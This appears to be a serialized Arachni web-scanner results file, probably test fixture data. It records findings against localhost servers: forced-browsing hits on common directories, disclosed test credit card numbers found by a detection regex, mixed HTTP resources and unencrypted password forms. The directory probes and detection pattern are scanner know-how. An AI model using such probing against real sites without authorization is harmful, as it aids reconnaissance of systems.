to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/export/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/export/ injected: export id: export elem: path remarks: {} method: '' response: export headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/testweb/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/testweb/ injected: testweb id: testweb elem: path remarks: {} method: '' response: testweb headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/~log/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/~log/ injected: ~log id: ~log elem: path remarks: {} method: '' response: ~log headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/error_log/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/error_log/ injected: error_log id: error_log elem: path remarks: {} method: '' response: error_log headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/ccbill/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/ccbill/ injected: ccbill id: ccbill elem: path remarks: {} method: '' response: ccbill headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/network/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/network/ injected: network id: network elem: path remarks: {} method: '' response: network headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/xamp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/xamp/ injected: xamp id: xamp elem: path remarks: :stuff: - Blah - Blah2 method: '' response: xamp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/xampp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/xampp/ injected: xampp id: xampp elem: path remarks: {} method: '' response: xampp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/lamp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/lamp/ injected: lamp id: lamp elem: path remarks: :stuff: - Blah - Blah2 method: '' response: lamp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 var: url: http://localhost:12726/discover elem: body method: GET name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. mod_name: Credit card number disclosure variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 opts: :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) :match: '6011111111111117' :element: body var: url: http://localhost:12726/discover injected: id: regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) regexp_match: '6011111111111117' elem: body remarks: {} method: GET response: '6011111111111117' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary 
"RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. mod_name: Credit card number disclosure variations: [] internal_modname: CreditCards internal_modname: CreditCards - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 var: url: http://localhost:12726/master elem: body method: GET name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. 
mod_name: Credit card number disclosure variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 opts: :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) :match: '5555555555554444' :element: body var: url: http://localhost:12726/master injected: id: regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) regexp_match: '5555555555554444' elem: body remarks: {} method: GET response: '5555555555554444' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. 
mod_name: Credit card number disclosure variations: [] internal_modname: CreditCards internal_modname: CreditCards - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 var: url: http://localhost:12726/visa elem: body method: GET name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. mod_name: Credit card number disclosure variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm Luhn Ruby implementation: https://gist.github.com/1182499 opts: :regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) :match: '4111111111111111' :element: body var: url: http://localhost:12726/visa injected: id: regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b) regexp_match: '4111111111111111' elem: body remarks: {} method: GET response: '4111111111111111' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": 
!binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Credit card number disclosure description: A credit card number is disclosed in the body of the page. tags: [] cwe: '200' cwe_url: http://cwe.mitre.org/data/definitions/200.html severity: Medium remedy_guidance: Remove credit card numbers from the body of the HTML pages. mod_name: Credit card number disclosure variations: [] internal_modname: CreditCards internal_modname: CreditCards - !ruby/object:Arachni::Issue verification: false references: Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html var: url: https://localhost:10557/vuln_script elem: body method: GET name: Mixed Resource description: ! "Serving resources over an unencrypted channel\n while the HTML code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide a false sense of security." tags: - unencrypted - resource - javascript - stylesheet severity: Medium remedy_guidance: Configure the server to serve all resources over the encrypted channel. mod_name: Mixed Resource variations: - !ruby/object:Arachni::Issue verification: false references: Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html opts: :regexp: !binary |- aHR0cDovL2xvY2FsaG9zdC9zdHVmZi5qcw== :match: http://localhost/stuff.js :element: body var: url: https://localhost:10557/vuln_script injected: id: regexp: http://localhost/stuff.js regexp_match: http://localhost/stuff.js elem: body remarks: {} method: GET response: ! 
' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KSBPcGVuU1NM LzEuMC4xYw== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Mixed Resource description: ! "Serving resources over an unencrypted channel\n while the HTML code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide a false sense of security." tags: - unencrypted - resource - javascript - stylesheet severity: Medium remedy_guidance: Configure the server to serve all resources over the encrypted channel. mod_name: Mixed Resource variations: [] internal_modname: MixedResource internal_modname: MixedResource - !ruby/object:Arachni::Issue verification: false references: Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html var: url: https://localhost:10557/vuln_link elem: body method: GET name: Mixed Resource description: ! "Serving resources over an unencrypted channel\n while the HTML code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide a false sense of security." tags: - unencrypted - resource - javascript - stylesheet severity: Medium remedy_guidance: Configure the server to serve all resources over the encrypted channel. 
mod_name: Mixed Resource variations: - !ruby/object:Arachni::Issue verification: false references: Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html opts: :regexp: !binary |- aHR0cDovL2xvY2FsaG9zdC90aGVtZS5jc3M= :match: http://localhost/theme.css :element: body var: url: https://localhost:10557/vuln_link injected: id: regexp: http://localhost/theme.css regexp_match: http://localhost/theme.css elem: body remarks: {} method: GET response: ! ' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KSBPcGVuU1NM LzEuMC4xYw== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Mixed Resource description: ! "Serving resources over an unencrypted channel\n while the HTML code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide a false sense of security." tags: - unencrypted - resource - javascript - stylesheet severity: Medium remedy_guidance: Configure the server to serve all resources over the encrypted channel. 
mod_name: Mixed Resource variations: [] internal_modname: MixedResource internal_modname: MixedResource - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection var: insecure url: http://localhost:11399/insecure elem: form method: GET name: Unencrypted password form description: Transmission of password does not use an encrypted channel. tags: - unencrypted - password - form cwe: '319' cwe_url: http://cwe.mitre.org/data/definitions/319.html severity: Medium remedy_guidance: Forms with sensitive content, like passwords, must be sent over HTTPS. mod_name: Unencrypted password forms variations: - !ruby/object:Arachni::Issue verification: false references: OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection opts: :var: !binary |- aW5zZWN1cmU= :match: ! "
\n \n
" :element: form :regexp: '' var: insecure url: http://localhost:11399/insecure injected: id: regexp: '' regexp_match: ! "
\n \n
" elem: form remarks: {} method: GET response: ! "
\n \n
\n\n
